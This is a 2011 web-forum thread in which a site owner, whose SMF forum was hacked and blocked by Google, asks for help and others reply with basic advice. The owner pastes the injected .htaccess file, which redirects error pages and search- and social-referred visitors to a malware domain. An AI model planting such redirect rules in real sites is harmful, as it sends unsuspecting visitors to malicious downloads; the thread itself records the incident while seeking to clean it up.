help! site hacked, google blocked smf 2 rc 4

giz · January 26, 2011, 08:59:26 AM

help!!!
my site has been hacked, last night one of our members emailed me reporting that the website was being redirected to somewhere else. unfortunately i did not get this message and in the mean time google has blocked the website.
i am currently using smf 2 rc4 and digistore 4.0 which i have just removed.
how do i find the malware?
the only thing google has told me is:

Of the 5 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-01-25, and the last time suspicious content was found on this site was on 2011-01-25.

Malicious software is hosted on 1 domain(s), including lampapomontage.ru/.

This site was hosted on 1 network(s) including AS51468 (ONECOM).

giz · January 26, 2011, 09:13:39 AM

unfortunately the last time i backed up the whole site i was using smf 1.12
but it looks like a .htaccess file has been added to the root folder.
here are the contents:

Code Select



















































																														RewriteEngine On																														
																														ErrorDocument 400 http://lampapomontage.ru/in.cgi?8																														
																														ErrorDocument 401 http://lampapomontage.ru/in.cgi?8																														
																														ErrorDocument 403 http://lampapomontage.ru/in.cgi?8																														
																														ErrorDocument 404 http://lampapomontage.ru/in.cgi?8																														
																														ErrorDocument 500 http://lampapomontage.ru/in.cgi?8																														
																														RewriteCond %{HTTP_REFERER} .*google.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*ask.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*baidu.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*youtube.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*qq.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*excite.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*altavista.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*msn.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*netscape.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*aol.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*goto.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*mamma.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*lycos.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*search.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*bing.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*facebook.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*twitter.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*blog.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*live.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*myspace.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*mail.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*yandex.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*rambler.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*ya.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*aport.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]																														
																														RewriteCond %{HTTP_REFERER} .*flickr.*																														
																														RewriteRule ^(.*)$ http://lampapomontage.ru/in.cgi?8 [R=301,L]

i'll delete this file now but is there a tool i can use to scan the whole site for malware?

giz · January 26, 2011, 09:24:43 AM

there was also a banner added to the attachments folder

Illori · January 26, 2011, 09:44:28 AM

did you check all your files to see if any had been edited? did you contact your host to let them know?

giz · January 26, 2011, 09:53:24 AM

the host is one.com and were not very helpful at all

i'm just going through them all with filezilla and checking the last modified date, if the date is yesterday then i'll edit them but so far all is ok with the forum, i think it's just a case of ftp hack and redirecting visitors to another site.
i've changed all passwords now and i need to look at more security. any advice on good free website security and a scanner of some sorts would be appreciated

Illori · January 26, 2011, 10:20:02 AM

you might want to post in the hosting board and see if you can find a new host that is more secure then this one.

CASMAN · January 26, 2011, 10:29:04 AM

Giz I am also interested in Website Security
I found this Security website
Says Security and Performance Applications
I dont know the reputation of the Company but will Check Later
/
https://www.alertsite.com/aslp_sec_vscan.html?ascamp=msn_security_scan

Aleksi "Lex" Kilpinen · February 24, 2011, 03:18:44 AM

CASMAN - If you do not know the reputation of a Security software or Site, you should NOT be advertising it. There are loads of rogue security software around, and so you should advertise (link to) only software you really trust yourself.

News:

help! site hacked, google blocked smf 2 rc 4